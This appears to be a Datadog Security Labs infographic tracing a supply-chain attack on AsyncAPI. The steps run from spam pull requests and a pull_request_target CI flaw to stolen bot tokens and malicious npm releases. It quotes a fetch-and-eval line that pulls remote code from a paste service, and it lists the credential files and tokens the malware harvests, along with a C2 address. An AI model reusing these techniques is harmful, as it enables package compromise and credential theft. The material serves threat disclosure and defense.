Step 1
A spam smokescreen

8 accounts open 36 near-identical PRs (docs: add donation files), burying the real attack in noise.

Step 2
A malicious PR hidden in the noise

PR #2155 (docs: add template) comes from a now-deleted fork. Only a gap in the PR numbering remains:

…#2153 #2154 # no 2155? #2156 #2157…
Step 3
A vulnerable CI workflow (PwnRequest)

The Docs Preview (Netlify) job runs untrusted fork code with repository secrets via pull_request_target. The attacker hides JS in the docs build.

Step 4
Malicious code runs inside CI

CI executes the payload, which fetches and evals a second stage from a paste service:

fetchRentryText().then(code => { eval(code); }); // src: rentry[.]co/elzotebo999
Second stage · runs in the runner
CI-aware credential theft
Dumps
Scans /proc/*/environ for INPUT_GITHUB-TOKEN, NETLIFY_AUTH_TOKEN, NETLIFY_SITE_ID
Hooks
Patches actions/checkout@v5 (dist/index.js) to grab credentials at pipeline exit
Exfil
Sends stolen credentials to rentry[.]co/elzotebo
Impact
Release credentials compromised

The attacker steals asyncapi-bot's GitHub release token, and likely the project's Netlify credentials.

Datadog Security Labs
Step 1
Malicious commits pushed as the release bot

Using asyncapi-bot's stolen token, the attacker stages commits on a throwaway next branch:

05:42
Malicious commit 14da44f pushed to new next branch
05:46
next reset to clean commit ff010ef
05:51
224b7fe (fix: test release workflow on next)
07:05
3eab3ec force-pushed, the published version
Step 2
CI/CD release pipeline publishes to npm

A fix: commit satisfies the pipeline's trigger condition, so the trusted Release workflow publishes to npm automatically:

if: startsWith(github.event.commits[0].message, 'fix:') …

The attacker then deletes the run to cover their tracks.

Step 3
Four compromised packages
@asyncapi/generator3.3.1
@asyncapi/generator-components0.7.1
@asyncapi/generator-helpers1.1.1
@asyncapi/specs6.11.2 6.11.2-alpha.1
Step 4
Victim runs npm install

The injected code spawns a detached node -e that fetches and runs the second stage from IPFS.

Final payload
Credential-stealing malware
C2
85.137.53[.]71
Harvests
.aws/credentials, .kube/config, GCP & npm tokens, Slack / Discord / Telegram secrets
Guardrails
Only runs commands signed with the attacker's secp256k1 key
Datadog Security Labs